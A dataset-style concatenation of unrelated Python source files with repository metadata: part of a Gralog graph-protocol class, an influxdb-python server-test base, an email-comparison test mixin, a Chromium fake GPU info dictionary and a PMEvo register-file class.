return(self.getAllEdges())
# start: best for private use!
def getNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getNeighbours#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
neighbourIdStringList = (sys.stdin.readline()).split("#")
neighboursList = []
for neighbourIdString in neighbourIdStringList:
if representsInt(neighbourIdString):
v = self.getVertexOrNew(neighbourIdString)
neighboursList.append(v)
return neighboursList
def getOutgoingNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getOutgoingNeighbours#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
outgoingNeighbourIdStringList = (sys.stdin.readline()).split("#")
outgoingNeighboursList = []
for outgoingNeighbourIdString in outgoingNeighbourIdStringList:
if representsInt(outgoingNeighbourIdString):
v = self.getVertexOrNew(outgoingNeighbourIdString)
outgoingNeighboursList.append(v)
return outgoingNeighboursList
def getIncomingNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getIncomingNeighbours#"+str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
incomingNeighbourIdStringList = (sys.stdin.readline()).split("#")
incomingNeighboursList = []
for incomingNeighbourIdString in incomingNeighbourIdStringList:
if representsInt(incomingNeighbourIdString):
v = self.getVertexOrNew(incomingNeighbourIdString)
incomingNeighboursList.append(v)
return incomingNeighboursList
def getIncidentEdges(self, vertex):
# return: list of Edge objects with id's only
vertex = vertexId(vertex)
line = "getIncidentEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getAdjacentEdges(self, edge):
# return: list of Edge objects with id's only
line = "getAdjacentEdges#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getOutgoingEdges(self, vertex):
# return: list of Edge objects with id's only
vertex = vertexId(vertex)
line = "getOutgoingEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getIncomingEdges(self, vertex):
# return: list of Edge objects with id's only
vertex = vertexId(vertex)
line = "getIncomingEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getEdgeWeight(self, edge):
return self.getEdgeProperty(edge, "weight")
def getEdgeLabel(self, edge):
return self.getEdgeProperty(edge, "label")
def getEdgeProperty(self, edge, prop):
# internally: fill edge property dictionary
# return: String representing queried property
line = "getEdgeProperty#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + prop.rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
edgeTuple = sys.stdin.readline().rstrip()
edge.sourceProperties(edgeTuple)
return edge.getProperty(prop)
def getVertexProperty(self, vertex, prop):
# internally: fill edge property dictionary
# return: String representing queried property
vid = vertexId(vertex)
line = "getVertexProperty#"+str(self.id).rstrip() + "#"
line = line + vid
line = line + "#" + prop.rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
vertexTuple = sys.stdin.readline().rstrip()
vertex.sourceProperties(vertexTuple)
return vertex.getProperty(prop)
# end: best use privately!
def requestVertex(self):
line = "requestVertex#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vid = sys.stdin.readline().rstrip()
vertex = self.getVertexOrNew(vid)
return vertex
def requestRandomVertex(self):
line = "requestRandomVertex#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vid = sys.stdin.readline().rstrip()
vertex = self.getVertexOrNew(vid)
return vertex
def requestEdge(self):
line = "requestEdge#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vid = sys.stdin.readline().rstrip()
edge = self.getEdgeOrNew(vid)
return edge
def requestRandomEdge(self):
line = "requestRandomEdge#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
eid = sys.stdin.readline().rstrip()
edge = self.getEdgeOrNew(eid)
return edge
def requestInteger(self):
line = "requestInteger#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
i = sys.stdin.readline().rstrip()
return int(i)
def requestFloat(self):
line = "requestFloat#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
d = sys.stdin.readline().rstrip()
return float(d)
def requestString(self):
line = "requestString#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
st = sys.stdin.readline().rstrip()
return str(st)
# runtime changer functions
def pauseUntilSpacePressed(self, *args):
line = "pauseUntilSpacePressed"
rank = None
try:
rank = int(args[0])
except:
pass
if len(args) > 0 and rank != None:
rank = int(args[0])
args = args[1:]
argString = ""
if rank != None:
argString += "#"+str(rank).rstrip()
for key in sorted(self.variablesToTrack.keys()):
term = "#("+str(key).rstrip()+"=" + \ str(self.variablesToTrack[key]).rstrip()+")"
argString = argString + term.rstrip()
for x in args:
if len(x) != 2:
argString = "#(syntax=pauseUntilSpacePressed((key, val)))"
break
if (type(x) == list):
for each in x:
term = "#("+"arrayyyy"+str(each[0])+"="+str(each[1])+")"
argString = argString + term
else:
term = "#("+str(x[0])+"="+str(x[1])+")"
argString = argString + term.rstrip()
line = line + argString
print(line)
sys.stdout.flush()
toSkip = sys.stdin.readline()
def track(self, name, var):
# ideally, something like this:
self.variablesToTrack[name] = var # if this is a pointer, it will work
# if it is an int or str, or some other non-reference type, it will not
def unTrack(self, name):
del self.variablesToTrack[name]
def sendMessage(self, toSend):
print(toSend)
sys.stdout.flush()
def message(self, message):
print("message#"+str(self.id).rstrip() + "#"+str(message).rstrip())
sys.stdout.flush()
def sendErrorToGralog(self, toSend):
print("error#"+str(self.id).rstrip() + "#"+str(toSend).rstrip())
sys.stdout.flush()
exit()
def mistakeLine(self):
print("wubbadubdub 3 men in a tub")
sys.stdout.flush()
sys.stdin.readline()
def pause(self, *args):
self.pauseUntilSpacePressed(*args)
# end runtime changer functions
def __str__(self):
vertices = [str(v) for v in self.id_to_vertex]
vertices.sort()
edges = [str(e) for e in self.getEdges()]
edges.sort()
return "VERTICES: " + " ".join(vertices) + "\nEDGES: " + " ".join(edges)
def gPrint(message):
if not message: # empty: print nothing except the new line (hacked with \t; <space> doesn't work)
print("gPrint#-1#" + "\t")
sys.stdout.flush()
else:
message = str(message)
lines = message.split('\n')
for line in lines:
print("gPrint#-1#" + line)
sys.stdout.flush()
def representsInt(s):
try:
int(s)
return True
except ValueError:
return False
| [] |
ocworld/influxdb-python | influxdb/tests/server_tests/base.py | a6bfe3e4643fdc775c97e1c4f457bc35d86e631e | # -*- coding: utf-8 -*-
"""Define the base module for server test."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import sys
from influxdb.tests import using_pypy
from influxdb.tests.server_tests.influxdb_instance import InfluxDbInstance
from influxdb.client import InfluxDBClient
if not using_pypy:
from influxdb.dataframe_client import DataFrameClient
def _setup_influxdb_server(inst):
inst.influxd_inst = InfluxDbInstance(
inst.influxdb_template_conf,
udp_enabled=getattr(inst, 'influxdb_udp_enabled', False),
)
inst.cli = InfluxDBClient('localhost',
inst.influxd_inst.http_port,
'root',
'',
database='db')
if not using_pypy:
inst.cliDF = DataFrameClient('localhost',
inst.influxd_inst.http_port,
'root',
'',
database='db')
def _teardown_influxdb_server(inst):
remove_tree = sys.exc_info() == (None, None, None)
inst.influxd_inst.close(remove_tree=remove_tree)
class SingleTestCaseWithServerMixin(object):
"""Define the single testcase with server mixin.
A mixin for unittest.TestCase to start an influxdb server instance
in a temporary directory **for each test function/case**
"""
# 'influxdb_template_conf' attribute must be set
# on the TestCase class or instance.
@classmethod
def setUp(cls):
"""Set up an instance of the SingleTestCaseWithServerMixin."""
_setup_influxdb_server(cls)
@classmethod
def tearDown(cls):
"""Tear down an instance of the SingleTestCaseWithServerMixin."""
_teardown_influxdb_server(cls)
class ManyTestCasesWithServerMixin(object):
"""Define the many testcase with server mixin.
Same as the SingleTestCaseWithServerMixin but this module creates
a single instance for the whole class. Also pre-creates a fresh
database: 'db'.
"""
# 'influxdb_template_conf' attribute must be set on the class itself !
@classmethod
def setUpClass(cls):
"""Set up an instance of the ManyTestCasesWithServerMixin."""
_setup_influxdb_server(cls)
def setUp(self):
"""Set up an instance of the ManyTestCasesWithServerMixin."""
self.cli.create_database('db')
@classmethod
def tearDownClass(cls):
"""Deconstruct an instance of ManyTestCasesWithServerMixin."""
_teardown_influxdb_server(cls)
def tearDown(self):
"""Deconstruct an instance of ManyTestCasesWithServerMixin."""
self.cli.drop_database('db')
| [((26, 15, 30, 44), 'influxdb.client.InfluxDBClient', 'InfluxDBClient', (), '', False, 'from influxdb.client import InfluxDBClient\n'), ((32, 21, 36, 51), 'influxdb.dataframe_client.DataFrameClient', 'DataFrameClient', (), '', False, 'from influxdb.dataframe_client import DataFrameClient\n'), ((40, 18, 40, 32), 'sys.exc_info', 'sys.exc_info', ({}, {}), '()', False, 'import sys\n')] |
cadithealth/genemail | genemail/testing.py | d906ad9deec70a6b19b66c244044d4466df2371a | # -*- coding: utf-8 -*-
#------------------------------------------------------------------------------
# file: $Id$
# auth: Philip J Grabner <[email protected]>
# date: 2013/10/21
# copy: (C) Copyright 2013 Cadit Health Inc., All Rights Reserved.
#------------------------------------------------------------------------------
# todo: this could be smarter... for example, it could:
# - detect when references resolve to the same content, but
# by different Content-IDs
# - detect when multipart sections could collapse to the same
# semantic structure
from __future__ import absolute_import
import unittest, email
from .util import smtpHeaderFormat
#------------------------------------------------------------------------------
def canonicalHeaders(message, ignore=None):
'''
Returns a canonical string representation of the `message` headers,
with the following changes made:
* The MIME boundary specified in the "Content-Type" header, if
specified, removed.
* Any headers listed in `ignore` are removed.
:Parameters:
ignore : list(str), optional, default: ['Content-Transfer-Encoding']
List of headers that should not be included in the canonical
form.
'''
if ignore is None:
ignore = ['Content-Transfer-Encoding']
ignore = [key.lower() for key in ignore]
hdrs = {key.lower(): '; '.join(sorted(message.get_all(key)))
for key in message.keys()
if key.lower() not in ignore}
hdrs['content-type'] = '; '.join(['='.join(filter(None, pair))
for pair in message.get_params()
if pair[0].lower() != 'boundary'])
return '\n'.join([
smtpHeaderFormat(key) + ': ' + hdrs[key]
for key in sorted(hdrs.keys())]) + '\n'
#------------------------------------------------------------------------------
def canonicalStructure(message):
ret = message.get_content_type() + '\n'
if not message.is_multipart():
return ret
msgs = message.get_payload()
for idx, msg in enumerate(msgs):
last = idx + 1 >= len(msgs)
indent = '\n|-- ' if not last else '\n '
ret += '|-- ' if not last else '`-- '
ret += indent.join(canonicalStructure(msg)[:-1].split('\n')) + '\n'
return ret
#------------------------------------------------------------------------------
def makemsg(msg, submsg):
if msg is None:
return submsg
return msg + ' (' + submsg + ')'
#------------------------------------------------------------------------------
class EmailTestMixin(object):
mime_cmp_factories = {
'text/html' : lambda self, ct: self.try_assertXmlEqual,
'text/xml' : lambda self, ct: self.try_assertXmlEqual,
'text/*' : lambda self, ct: self.assertMultiLineEqual,
'*/*' : lambda self, ct: self.assertEqual,
}
#----------------------------------------------------------------------------
def registerMimeComparator(self, mimetype, comparator):
def factory(self, ct):
return comparator
self.mime_cmp_factories = dict(EmailTestMixin.mime_cmp_factories)
self.mime_cmp_factories[mimetype] = factory
#----------------------------------------------------------------------------
def _parseEmail(self, eml):
return email.message_from_string(eml)
#----------------------------------------------------------------------------
def assertEmailHeadersEqual(self, eml1, eml2, msg=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailHeadersEqual(eml1, eml2, msg=msg)
#----------------------------------------------------------------------------
def assertNotEmailHeadersEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailHeadersEqual(eml1, eml2, msg=msg)
self.fail(msg or 'email headers %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailStructureEqual(self, eml1, eml2, msg=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailStructureEqual(eml1, eml2, msg=msg)
#----------------------------------------------------------------------------
def assertNotEmailStructureEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailStructureEqual(eml1, eml2, msg=msg)
self.fail(msg or 'email structure %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailContentEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailContentEqual(eml1, eml2, msg=msg, mcf=mime_cmp_factories)
#----------------------------------------------------------------------------
def assertNotEmailContentEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailContentEqual(eml1, eml2, msg=msg)
self.fail(msg or 'email content %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailHeadersEqual(eml1, eml2, msg=msg)
self._assertEmailStructureEqual(eml1, eml2, msg=msg)
self._assertEmailContentEqual(eml1, eml2, msg=msg, mcf=mime_cmp_factories)
#----------------------------------------------------------------------------
def assertNotEmailEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
try:
self.assertEmailEqual(eml1, eml2, msg=msg, mime_cmp_factories=mime_cmp_factories)
self.fail(msg or 'email %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def _assertEmailHeadersEqual(self, msg1, msg2, msg=None):
hdr1 = 'EMAIL HEADERS:\n' + canonicalHeaders(msg1)
hdr2 = 'EMAIL HEADERS:\n' + canonicalHeaders(msg2)
self.assertMultiLineEqual(hdr1, hdr2, msg=msg)
#----------------------------------------------------------------------------
def _assertEmailStructureEqual(self, msg1, msg2, msg=None):
str1 = 'EMAIL STRUCTURE:\n' + canonicalStructure(msg1)
str2 = 'EMAIL STRUCTURE:\n' + canonicalStructure(msg2)
self.assertMultiLineEqual(str1, str2, msg=msg)
#----------------------------------------------------------------------------
def _assertEmailContentEqual(self, msg1, msg2, msg=None, mcf=None, context=None):
if context is None:
context = 'component root'
self.assertEqual(
msg1.is_multipart(), msg2.is_multipart(),
msg=makemsg(msg, context + ' is not multipart similar'))
self.assertEqual(
msg1.get_content_type(), msg2.get_content_type(),
msg=makemsg(msg, context + ' has content-type mismatch'))
if context == 'component root':
context = 'component ' + msg1.get_content_type()
if not msg1.is_multipart():
return self._assertEmailPayloadEqual(
msg1, msg2, msg=msg, mcf=mcf, context=context)
msgs1 = msg1.get_payload()
msgs2 = msg2.get_payload()
self.assertEqual(
len(msgs1), len(msgs2),
msg=makemsg(msg, context + ' has sub-message count mismatch'))
for idx, submsg in enumerate(msgs1):
sctxt = context + '[' + str(idx) + '] > ' + submsg.get_content_type()
self._assertEmailContentEqual(
submsg, msgs2[idx], msg=msg, mcf=mcf, context=sctxt)
#----------------------------------------------------------------------------
def _assertEmailPayloadEqual(self, msg1, msg2, msg=None, mcf=None, context='message'):
# paranoia...
self.assertFalse(msg1.is_multipart() or msg2.is_multipart())
self.assertEqual(msg1.get_content_type(), msg2.get_content_type())
# /paranoia...
dat1 = msg1.get_payload(decode=True)
dat2 = msg2.get_payload(decode=True)
def getcmp(msg, mcf):
ret = mcf.get(msg.get_content_type())
if ret is None:
ret = mcf.get(msg.get_content_maintype() + '/*')
if ret is None:
ret = mcf.get('*/*')
return ret
pcmp = None
if mcf is not None:
pcmp = getcmp(msg1, mcf)
if pcmp is None:
pcmp = getcmp(msg1, self.mime_cmp_factories)
self.assertIsNotNone(
pcmp, 'no comparator for mime-type "%s"' % (msg1.get_content_type(),))
pcmp = pcmp(self, msg1.get_content_type())
try:
pcmp(dat1, dat2)
except AssertionError as err:
raise AssertionError(
makemsg(msg, context + ' has different payload') + '; ' + err.message)
#----------------------------------------------------------------------------
def try_assertXmlEqual(self, dat1, dat2, msg=None):
if hasattr(self, 'assertXmlEqual'):
return self.assertXmlEqual(dat1, dat2)
return self.assertMultiLineEqual(dat1, dat2)
#------------------------------------------------------------------------------
# end of $Id$
#------------------------------------------------------------------------------
| [((88, 11, 88, 41), 'email.message_from_string', 'email.message_from_string', ({(88, 37, 88, 40): 'eml'}, {}), '(eml)', False, 'import unittest, email\n')] |
tingshao/catapult | telemetry/telemetry/testing/internal/fake_gpu_info.py | a8fe19e0c492472a8ed5710be9077e24cc517c5c | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This dictionary of GPU information was captured from a run of
# Telemetry on a Linux workstation with NVIDIA GPU. It helps test
# telemetry.internal.platform's GPUInfo class, and specifically the
# attributes it expects to find in the dictionary; if the code changes
# in an incompatible way, tests using this fake GPU info will begin
# failing, indicating this fake data must be updated.
#
# To regenerate it, import pdb in
# telemetry/internal/platform/gpu_info.py and add a call to
# pdb.set_trace() in GPUInfo.FromDict before the return statement.
# Print the attrs dictionary in the debugger and copy/paste the result
# on the right-hand side of this assignment. Then run:
#
# pyformat [this file name] | sed -e "s/'/'/g"
#
# and put the output into this file.
FAKE_GPU_INFO = {
'feature_status':
{
'flash_stage3d': 'enabled',
'gpu_compositing': 'enabled',
'video_decode': 'unavailable_software',
'flash_3d': 'enabled',
'webgl': 'enabled',
'video_encode': 'enabled',
'multiple_raster_threads': 'enabled_on',
'2d_canvas': 'unavailable_software',
'rasterization': 'disabled_software',
'flash_stage3d_baseline': 'enabled'
},
'aux_attributes':
{
'optimus': False,
'sandboxed': True,
'basic_info_state': 1,
'adapter_luid': 0.0,
'driver_version': '331.79',
'direct_rendering': True,
'amd_switchable': False,
'context_info_state': 1,
'process_crash_count': 0,
'pixel_shader_version': '4.40',
'gl_ws_version': '1.4',
'can_lose_context': False,
'driver_vendor': 'NVIDIA',
'max_msaa_samples': '64',
'software_rendering': False,
'gl_version': '4.4.0 NVIDIA 331.79',
'gl_ws_vendor': 'NVIDIA Corporation',
'vertex_shader_version': '4.40',
'initialization_time': 1.284043,
'gl_reset_notification_strategy': 33362,
'gl_ws_extensions':
'GLX_EXT_visual_info GLX_EXT_visual_rating GLX_SGIX_fbconfig '
'GLX_SGIX_pbuffer GLX_SGI_video_sync GLX_SGI_swap_control '
'GLX_EXT_swap_control GLX_EXT_swap_control_tear '
'GLX_EXT_texture_from_pixmap GLX_EXT_buffer_age '
'GLX_ARB_create_context GLX_ARB_create_context_profile '
'GLX_EXT_create_context_es_profile '
'GLX_EXT_create_context_es2_profile '
'GLX_ARB_create_context_robustness GLX_ARB_multisample '
'GLX_NV_float_buffer GLX_ARB_fbconfig_float GLX_NV_swap_group'
' GLX_EXT_framebuffer_sRGB GLX_NV_multisample_coverage '
'GLX_NV_copy_image GLX_NV_video_capture ',
'gl_renderer': 'Quadro 600/PCIe/SSE2',
'driver_date': '',
'gl_vendor': 'NVIDIA Corporation',
'gl_extensions':
'GL_AMD_multi_draw_indirect GL_ARB_arrays_of_arrays '
'GL_ARB_base_instance GL_ARB_blend_func_extended '
'GL_ARB_buffer_storage GL_ARB_clear_buffer_object '
'GL_ARB_clear_texture GL_ARB_color_buffer_float '
'GL_ARB_compatibility GL_ARB_compressed_texture_pixel_storage'
' GL_ARB_conservative_depth GL_ARB_compute_shader '
'GL_ARB_compute_variable_group_size GL_ARB_copy_buffer '
'GL_ARB_copy_image GL_ARB_debug_output '
'GL_ARB_depth_buffer_float GL_ARB_depth_clamp '
'GL_ARB_depth_texture GL_ARB_draw_buffers '
'GL_ARB_draw_buffers_blend GL_ARB_draw_indirect '
'GL_ARB_draw_elements_base_vertex GL_ARB_draw_instanced '
'GL_ARB_enhanced_layouts GL_ARB_ES2_compatibility '
'GL_ARB_ES3_compatibility GL_ARB_explicit_attrib_location '
'GL_ARB_explicit_uniform_location '
'GL_ARB_fragment_coord_conventions '
'GL_ARB_fragment_layer_viewport GL_ARB_fragment_program '
'GL_ARB_fragment_program_shadow GL_ARB_fragment_shader '
'GL_ARB_framebuffer_no_attachments GL_ARB_framebuffer_object '
'GL_ARB_framebuffer_sRGB GL_ARB_geometry_shader4 '
'GL_ARB_get_program_binary GL_ARB_gpu_shader5 '
'GL_ARB_gpu_shader_fp64 GL_ARB_half_float_pixel '
'GL_ARB_half_float_vertex GL_ARB_imaging '
'GL_ARB_indirect_parameters GL_ARB_instanced_arrays '
'GL_ARB_internalformat_query GL_ARB_internalformat_query2 '
'GL_ARB_invalidate_subdata GL_ARB_map_buffer_alignment '
'GL_ARB_map_buffer_range GL_ARB_multi_bind '
'GL_ARB_multi_draw_indirect GL_ARB_multisample '
'GL_ARB_multitexture GL_ARB_occlusion_query '
'GL_ARB_occlusion_query2 GL_ARB_pixel_buffer_object '
'GL_ARB_point_parameters GL_ARB_point_sprite '
'GL_ARB_program_interface_query GL_ARB_provoking_vertex '
'GL_ARB_robust_buffer_access_behavior GL_ARB_robustness '
'GL_ARB_sample_shading GL_ARB_sampler_objects '
'GL_ARB_seamless_cube_map GL_ARB_separate_shader_objects '
'GL_ARB_shader_atomic_counters GL_ARB_shader_bit_encoding '
'GL_ARB_shader_draw_parameters GL_ARB_shader_group_vote '
'GL_ARB_shader_image_load_store GL_ARB_shader_image_size '
'GL_ARB_shader_objects GL_ARB_shader_precision '
'GL_ARB_query_buffer_object '
'GL_ARB_shader_storage_buffer_object GL_ARB_shader_subroutine'
' GL_ARB_shader_texture_lod GL_ARB_shading_language_100 '
'GL_ARB_shading_language_420pack '
'GL_ARB_shading_language_include '
'GL_ARB_shading_language_packing GL_ARB_shadow '
'GL_ARB_stencil_texturing GL_ARB_sync '
'GL_ARB_tessellation_shader GL_ARB_texture_border_clamp '
'GL_ARB_texture_buffer_object '
'GL_ARB_texture_buffer_object_rgb32 '
'GL_ARB_texture_buffer_range GL_ARB_texture_compression '
'GL_ARB_texture_compression_bptc '
'GL_ARB_texture_compression_rgtc GL_ARB_texture_cube_map '
'GL_ARB_texture_cube_map_array GL_ARB_texture_env_add '
'GL_ARB_texture_env_combine GL_ARB_texture_env_crossbar '
'GL_ARB_texture_env_dot3 GL_ARB_texture_float '
'GL_ARB_texture_gather GL_ARB_texture_mirror_clamp_to_edge '
'GL_ARB_texture_mirrored_repeat GL_ARB_texture_multisample '
'GL_ARB_texture_non_power_of_two GL_ARB_texture_query_levels '
'GL_ARB_texture_query_lod GL_ARB_texture_rectangle '
'GL_ARB_texture_rg GL_ARB_texture_rgb10_a2ui '
'GL_ARB_texture_stencil8 GL_ARB_texture_storage '
'GL_ARB_texture_storage_multisample GL_ARB_texture_swizzle '
'GL_ARB_texture_view GL_ARB_timer_query '
'GL_ARB_transform_feedback2 GL_ARB_transform_feedback3 '
'GL_ARB_transform_feedback_instanced GL_ARB_transpose_matrix '
'GL_ARB_uniform_buffer_object GL_ARB_vertex_array_bgra '
'GL_ARB_vertex_array_object GL_ARB_vertex_attrib_64bit '
'GL_ARB_vertex_attrib_binding GL_ARB_vertex_buffer_object '
'GL_ARB_vertex_program GL_ARB_vertex_shader '
'GL_ARB_vertex_type_10f_11f_11f_rev '
'GL_ARB_vertex_type_2_10_10_10_rev GL_ARB_viewport_array '
'GL_ARB_window_pos GL_ATI_draw_buffers GL_ATI_texture_float '
'GL_ATI_texture_mirror_once GL_S3_s3tc GL_EXT_texture_env_add'
' GL_EXT_abgr GL_EXT_bgra GL_EXT_bindable_uniform '
'GL_EXT_blend_color GL_EXT_blend_equation_separate '
'GL_EXT_blend_func_separate GL_EXT_blend_minmax '
'GL_EXT_blend_subtract GL_EXT_compiled_vertex_array '
'GL_EXT_Cg_shader GL_EXT_depth_bounds_test '
'GL_EXT_direct_state_access GL_EXT_draw_buffers2 '
'GL_EXT_draw_instanced GL_EXT_draw_range_elements '
'GL_EXT_fog_coord GL_EXT_framebuffer_blit '
'GL_EXT_framebuffer_multisample '
'GL_EXTX_framebuffer_mixed_formats '
'GL_EXT_framebuffer_multisample_blit_scaled '
'GL_EXT_framebuffer_object GL_EXT_framebuffer_sRGB '
'GL_EXT_geometry_shader4 GL_EXT_gpu_program_parameters '
'GL_EXT_gpu_shader4 GL_EXT_multi_draw_arrays '
'GL_EXT_packed_depth_stencil GL_EXT_packed_float '
'GL_EXT_packed_pixels GL_EXT_pixel_buffer_object '
'GL_EXT_point_parameters GL_EXT_provoking_vertex '
'GL_EXT_rescale_normal GL_EXT_secondary_color '
'GL_EXT_separate_shader_objects '
'GL_EXT_separate_specular_color '
'GL_EXT_shader_image_load_store GL_EXT_shadow_funcs '
'GL_EXT_stencil_two_side GL_EXT_stencil_wrap GL_EXT_texture3D'
' GL_EXT_texture_array GL_EXT_texture_buffer_object '
'GL_EXT_texture_compression_dxt1 '
'GL_EXT_texture_compression_latc '
'GL_EXT_texture_compression_rgtc '
'GL_EXT_texture_compression_s3tc GL_EXT_texture_cube_map '
'GL_EXT_texture_edge_clamp GL_EXT_texture_env_combine '
'GL_EXT_texture_env_dot3 GL_EXT_texture_filter_anisotropic '
'GL_EXT_texture_integer GL_EXT_texture_lod '
'GL_EXT_texture_lod_bias GL_EXT_texture_mirror_clamp '
'GL_EXT_texture_object GL_EXT_texture_shared_exponent '
'GL_EXT_texture_sRGB GL_EXT_texture_sRGB_decode '
'GL_EXT_texture_storage GL_EXT_texture_swizzle '
'GL_EXT_timer_query GL_EXT_transform_feedback2 '
'GL_EXT_vertex_array GL_EXT_vertex_array_bgra '
'GL_EXT_vertex_attrib_64bit GL_EXT_x11_sync_object '
'GL_EXT_import_sync_object GL_IBM_rasterpos_clip '
'GL_IBM_texture_mirrored_repeat GL_KHR_debug '
'GL_KTX_buffer_region GL_NV_bindless_multi_draw_indirect '
'GL_NV_blend_equation_advanced GL_NV_blend_square '
'GL_NV_compute_program5 GL_NV_conditional_render '
'GL_NV_copy_depth_to_color GL_NV_copy_image '
'GL_NV_depth_buffer_float GL_NV_depth_clamp '
'GL_NV_draw_texture GL_NV_ES1_1_compatibility '
'GL_NV_explicit_multisample GL_NV_fence GL_NV_float_buffer '
'GL_NV_fog_distance GL_NV_fragment_program '
'GL_NV_fragment_program_option GL_NV_fragment_program2 '
'GL_NV_framebuffer_multisample_coverage '
'GL_NV_geometry_shader4 GL_NV_gpu_program4 '
'GL_NV_gpu_program4_1 GL_NV_gpu_program5 '
'GL_NV_gpu_program5_mem_extended GL_NV_gpu_program_fp64 '
'GL_NV_gpu_shader5 GL_NV_half_float GL_NV_light_max_exponent '
'GL_NV_multisample_coverage GL_NV_multisample_filter_hint '
'GL_NV_occlusion_query GL_NV_packed_depth_stencil '
'GL_NV_parameter_buffer_object GL_NV_parameter_buffer_object2'
' GL_NV_path_rendering GL_NV_pixel_data_range '
'GL_NV_point_sprite GL_NV_primitive_restart '
'GL_NV_register_combiners GL_NV_register_combiners2 '
'GL_NV_shader_atomic_counters GL_NV_shader_atomic_float '
'GL_NV_shader_buffer_load GL_NV_shader_storage_buffer_object '
'GL_ARB_sparse_texture GL_NV_texgen_reflection '
'GL_NV_texture_barrier GL_NV_texture_compression_vtc '
'GL_NV_texture_env_combine4 GL_NV_texture_expand_normal '
'GL_NV_texture_multisample GL_NV_texture_rectangle '
'GL_NV_texture_shader GL_NV_texture_shader2 '
'GL_NV_texture_shader3 GL_NV_transform_feedback '
'GL_NV_transform_feedback2 GL_NV_vdpau_interop '
'GL_NV_vertex_array_range GL_NV_vertex_array_range2 '
'GL_NV_vertex_attrib_integer_64bit '
'GL_NV_vertex_buffer_unified_memory GL_NV_vertex_program '
'GL_NV_vertex_program1_1 GL_NV_vertex_program2 '
'GL_NV_vertex_program2_option GL_NV_vertex_program3 '
'GL_NVX_conditional_render GL_NVX_gpu_memory_info '
'GL_SGIS_generate_mipmap GL_SGIS_texture_lod '
'GL_SGIX_depth_texture GL_SGIX_shadow GL_SUN_slice_accum '
},
'devices':
[
{
'device_string': '',
'vendor_id': 4318.0,
'device_id': 3576.0,
'vendor_string': ''
}],
'driver_bug_workarounds':
['clear_uniforms_before_first_program_use',
'disable_gl_path_rendering',
'init_gl_position_in_vertex_shader',
'init_vertex_attributes',
'remove_pow_with_constant_exponent',
'scalarize_vec_and_mat_constructor_args',
'use_current_program_after_successful_link',
'use_virtualized_gl_contexts']
}
| [] |
qcjiang/pmevo-artifact | vm_setup/pmevo/measurement-server/PITE/register_file.py | bf5da1788f9ede42086c31b3996d9e41363cc7ee | #! /usr/bin/env python3
# vim: et:ts=4:sw=4:fenc=utf-8
from abc import ABC, abstractmethod
from collections import defaultdict
import re
class RegisterFile(ABC):
registers = NotImplemented
def __init__(self):
# for each register kind an index pointing to the next register to use
self.reset_indices()
def reset_indices(self):
self.next_indices = defaultdict(lambda:0)
def get_memory_base(self):
return self.registers["MEM"][0]["64"]
def get_div_register(self):
return self.registers["DIV"][0]["64"]
def get_clobber_list(self):
res = []
for k, v in self.registers.items():
for regset in v:
reg = regset["repr"]
if reg is not None:
res.append(reg)
return res
